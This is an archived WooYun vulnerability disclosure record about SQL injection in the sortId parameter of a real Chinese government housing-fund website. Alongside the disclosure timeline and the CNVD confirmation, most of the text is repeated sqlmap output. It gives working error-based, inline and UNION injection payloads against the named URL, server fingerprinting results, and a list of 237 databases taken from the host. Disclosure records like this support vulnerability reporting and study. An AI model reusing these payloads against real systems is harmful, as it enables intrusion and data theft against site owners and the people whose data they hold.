乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 细节已通知厂商并且等待厂商处理中 2015-07-31: 厂商已经确认,细节仅向厂商公开 2015-08-10: 细节向核心白帽子及相关领域专家公开 2015-08-20: 细节向普通白帽子公开 2015-08-30: 细节向实习白帽子公开 2015-09-14: 细节向公众公开
http://www.tczfgjj.gov.cn/contact.aspx?sortId=30
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: sortId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: sortId=30 AND 8737=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8737=8737) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: sortId=(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4001=4001) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113)) Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: sortId=30 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(73)+CHAR(109)+CHAR(81)+CHAR(97)+CHAR(88)+CHAR(82)+CHAR(69)+CHAR(88)+CHAR(103)+CHAR(78)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113),NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000current database: 'net5586442'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: sortId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: sortId=30 AND 8737=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8737=8737) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: sortId=(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4001=4001) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113)) Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: sortId=30 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(73)+CHAR(109)+CHAR(81)+CHAR(97)+CHAR(88)+CHAR(82)+CHAR(69)+CHAR(88)+CHAR(103)+CHAR(78)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113),NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000available databases [237]:[*] ludatv[*] master[*] model[*] msdb[*] net0011828[*] net0017886[*] net0024900[*] net0028073[*] net0031520[*] net0034720[*] net0034800[*] net00397109[*] net0075921[*] net0091670[*] net0099717[*] net0108677[*] net0108703[*] net0111044[*] net0123081[*] net0143388[*] net0162958[*] net0178248[*] net0181025[*] net0210618[*] net0221568[*] net02264391[*] net0264390[*] net0267299[*] net02757737[*] net0277292[*] net0277773[*] net0282199[*] net0295893[*] net0298205[*] net0298908[*] net0314997[*] net0333551[*] net0352821[*] net0354314[*] net0356372[*] net0362455[*] net03705354[*] net0383379[*] net0393394[*] net0396167[*] net0396873[*] net0403516[*] net0405302[*] net0416770[*] net0445192[*] net0453453[*] net04602512[*] net0481206[*] net0484364[*] net0489282[*] net0494267[*] net0500841[*] net0501386[*] net0526098[*] net0528181[*] net0531900[*] net0575267[*] net0596294[*] net0606824[*] net0609984[*] net0621701[*] net0639452[*] net0645795[*] net0667893[*] net0668436[*] net0674752[*] net0679100[*] net0707892[*] net0712933[*] net0719510[*] net0721019[*] net0749312[*] net0775189[*] net0779351[*] net0792963[*] net0795451[*] net0821952[*] net0834205[*] net0842100[*] net0850246[*] net0860502[*] net0872765[*] net0885641[*] net0897907[*] net0909606[*] net0921385[*] net0931481[*] net0963090[*] net0974527[*] net0978607[*] net0979125[*] net0984459[*] net0993810[*] net1000755[*] net1018073[*] net1036508[*] net1055765[*] net1084572[*] net1087379[*] net1106452[*] net11325932[*] net1151328[*] net1162142[*] net11649461[*] net11659193[*] net1182906[*] net1190617[*] net1197122[*] net12058778[*] net1211101[*] net1222556[*] net1244992[*] net1247003[*] net1253220[*] net1265991[*] net1283552[*] net12854775[*] net1289532[*] net1317254[*] net1320099[*] net1346549[*] net1365795[*] net13717326[*] net1376588[*] net13796080[*] net1389902[*] net1398453[*] net1400512[*] net1417775[*] net1420227[*] net1437393[*] net1458900[*] net1480836[*] net1486353[*] net1486595[*] net1496268[*] net1497011[*] net1510061[*] net1511199[*] net1519619[*] net15281463[*] net15395743[*] net1544030[*] net1548844[*] net1564199[*] net1590911[*] net1601502[*] net1616384[*] net1622264[*] net1638655[*] net1642713[*] net1643710[*] net1687578[*] net1690626[*] net1693433[*] net1706247[*] net1713841[*] net1715649[*] net1716624[*] net1720396[*] net1727825[*] net1731040[*] net1744344[*] net1754621[*] net1757049[*] net1758743[*] net1760593[*] net1767007[*] net1779637[*] net1830400[*] net1845366[*] net1848350[*] net18567962[*] net1870967[*] net1885497[*] net1905376[*] net1918257[*] net1921644[*] net1941695[*] net1941969[*] net1945488[*] net19479412[*] net1960418[*] net1962395[*] net1968478[*] net1972177[*] net1978385[*] net19785999[*] net1980783[*] net2029965[*] net2041725[*] net2047585[*] net2055978[*] net2059346[*] net2069587[*] net2071614[*] net2103654[*] net21405726[*] net2157239[*] net2167632[*] net2176987[*] net2178382[*] net2189737[*] net2206763[*] net2212041[*] net2224947[*] net2225855[*] net2236510[*] net22481662[*] net2256322[*] net2263663[*] net2270113[*] net22852210[*] net2322053[*] net2322462[*] net2333907[*] net2334469[*] net23347939[*] net2346126[*] net23478767[*] net2354447[*] net2358813[*] net2362416[*] net2363645[*] net2366854[*] net2371365[*] net2379778[*] net2401699[*] net2403339[*] net2404880[*] net2405780[*] net2453845
参数过滤
危害等级:中
漏洞Rank:10
确认时间:2015-07-31 17:50
CNVD确认所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置。
暂无